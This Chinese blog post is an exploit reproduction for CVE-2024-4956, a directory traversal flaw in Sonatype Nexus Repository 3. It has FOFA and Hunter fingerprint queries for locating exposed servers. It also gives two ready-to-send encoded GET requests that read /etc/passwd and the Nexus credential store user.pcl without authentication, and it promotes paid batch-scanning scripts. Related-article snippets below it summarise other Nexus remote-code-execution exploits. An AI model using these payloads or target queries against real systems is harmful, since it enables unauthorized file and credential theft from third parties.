Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956

最新推荐文章于 2024-09-23 22:06:58 发布
最新推荐文章于 2024-09-23 22:06:58 发布
阅读量900 收藏 6
点赞数 8
分类专栏: 漏洞复现集合 文章标签: 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d2407169866/article/details/139169722
版权

 0x01 免责声明
文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。

0x02 漏洞描述

Nexus是一个强大且使用广泛的Maven仓库管理器,它极大地简化了自己内部仓库的维护和外部仓库的访问,利用Nexus你可以只在一个地方就能够完全控制访问和部署在你所维护仓库中的每个Artifact。

Nexus Reposity3目录穿越-文件下载漏洞-CVE-2024-4956

影响版本:Nexus Repository 3 < 3.68.1

0x03 测绘查询-系统指纹

 fofa:app="Nexus-Repository-Manager"

鹰图:app.name=="Nexus Repository"

0x04 漏洞复现
1、访问漏洞系统


2、发送GET包,读取etc/password文件


3、读取密码文件

4、poc

GET /.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd HTTP/1.1Host:127.0.0.1

GET /.%2f/..%2f/..%2f/..%2f/..%2f/nexus-data/db/security/user.pcl HTTP/1.1Host:127.0.0.1

 0x05 Nuclei POC 批量验证脚本

加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc

点击链接加入帮会:加入帮会-发现更有料的网安圈基于安全从业者同行主题交流需求,为入驻者提供WIKI建设、安全经验输出、前沿技术及工具分享等模块,入驻即可共探安全思路。icon-default.png?t=N7T8https://wiki.freebuf.com/front/societyFront?invitation_code=2e2d0438&society_id=186&source_data=2

扫描也可加入:

Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 1407
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
Sonatype Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238)
不忘初心,护天下安全!
07-12 1765
研究人员在 Sonatype Nexus Repository Manager ( NXRM ) 3 中发现一个远程代码执行漏洞。Sonatype Nexus Repository Manager ( NXRM ) 3 是一个允许开发者管理软件开发、应用实现、自动硬件提供所必须的软件组件的开源项目。漏洞影响的 NXRM 3 目前安装量已经超过 15 万,该漏洞是腾讯安全云鼎实验室安全研究员 Rico 和长亭科技安全研究员 voidfyoo 发现的。研究人员通过分析发现利用该安全漏洞并不需要认证。因此攻击者很
【已复现】Sonatype Nexus Repository 3 路径遍历漏洞(CVE-2024-4956)安全风险通告
smellycat000的专栏
05-23 416
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径遍历漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开危害描述:未经身份认证的远程攻...
CVE-2024-4956实战
最新发布
m0_74402888的博客
09-23 304
Burpsuite抓包,修改GET请求即可(二、公司信息域名收集。三、抓包读取敏感文件。
Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
m0_46699477的博客
05-23 553
【代码】Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 1074
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
CVE-2024-4956Nexus Repository 3 路径穿越漏洞复现 [附POC]
薛定谔嘚喵博客
05-30 421
Sonatype Nexus Repository是美国Sonatype公司的一款存储库管理器,它主要用于管理、存储和分发软件等。 Sonatype Nexus Repository 3.68.1之前版本存在安全漏洞,该漏洞源于存在路径遍历,允许未经身份验证的攻击者读取系统文件。
CVE-2019-5475】Sonatype Nexus Repository Manager操作系统命令注入漏洞复现
Blog of Jaoing
04-21 1206
Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 Sonatype NXRM中存在操作系统命令注入漏洞。攻击者可利用该漏洞执行代码......
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1728
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
ch258563的博客
06-06 1686
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
Nexus Repository Manager 3 远程命令执行漏洞复现(CVE-2020-10199)
m0_68045701的博客
07-06 575
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。在攻击机kali上访问go/group API接口。Execute执行,并用burp suite抓包。抓包修改报文,使其可以创建一个666.sh文件。进入容器查看成功创建文件。执行,成功获取shell。进入msf找到相应模块。设置sessions。ps:监听要提前开启。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1249
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10204)
EC_Carrot的博客
07-15 412
漏洞复现 Nexus Repository Manager 3的3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞CVE-2018-16621的绕过 该漏洞需要访问更新角色或创建角色接口,所以我们需要登陆后台 登陆后台后获取当前Cookie和CSRF Token,并修改以下包: POST /service/extdirect HTTP/1.1 Host: your_ip:8081 Content-Length: 223 X-Requested-With: XMLHttpRequest X-
CVE-2020-11444:Nexus Repository Manager 3 远程命令执行漏洞
冬的博客
03-15 7154
简介 Nexus Repository是一个开源的仓库管理系统,可搭建npm、maven等私服。 Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 影响版本 Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 复现步骤 本文复现环境为攻击机kali,目标机为ubuntu 1、环境搭建 环境搭建利用vulhub中的CVE-2020-10144漏洞环境进行复现,其对应版本为3
vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞CVE-2024-4956
yougexiaojiuguan的博客
06-02 588
漏洞复现过程的记录
漏洞情报 | Sonatype Nexus Repository Manager 目录遍历漏洞
爱国小白帽
06-24 1310
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Sonatype Nexus Repository Manager 是美国Sonatype公司的一款仓库管理器。 360漏洞云监测到 Sonatype Nexus Repository Manager 3.x 系列 3.31.0 之前的版本存在目录遍历漏洞CVE-2021-34553)。经认证的远程攻击者可在未被授予访问权限的情况下获取blob文件清单,并通过构造一个GET请求读取blob文件内容,造成信息泄露。 0x02 危害等级 中
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-11444)
黑白的博客
12-05 2149
声明 好好学习,天天向上 漏洞描述 漏洞影响版本范围和危害是和CVE-2020-10199、CVE-2020-10204前后一个月时间出现的,爆出了10199和10204后面的一个补丁修复之后,再次爆出的11444漏洞Nexus 3 任意修改admin密码越权漏洞,可以用低权限用户登录获取sessionID越权进行修改admin用户的密码 影响范围 Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 复现过程 这里使用3.21.1版本 使用vulhub
nexus3.54.0版本存在哪些漏洞
06-08
我很抱歉,作为一个AI语言模型,我无法直接提供关于Nexus 3.54.0版本的漏洞信息。但是,我可以告诉您,获取关于软件或产品的漏洞信息应该通过官方途径进行,例如官方网站或安全公告。您可以在Sonatype官方网站上查找相关信息,他们是Nexus的开发公司。请注意,了解软件或产品中的漏洞信息非常重要,但是在公开讨论这些问题时,我们应该遵循适当的安全原则,以确保您和其他用户的安全和隐私。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值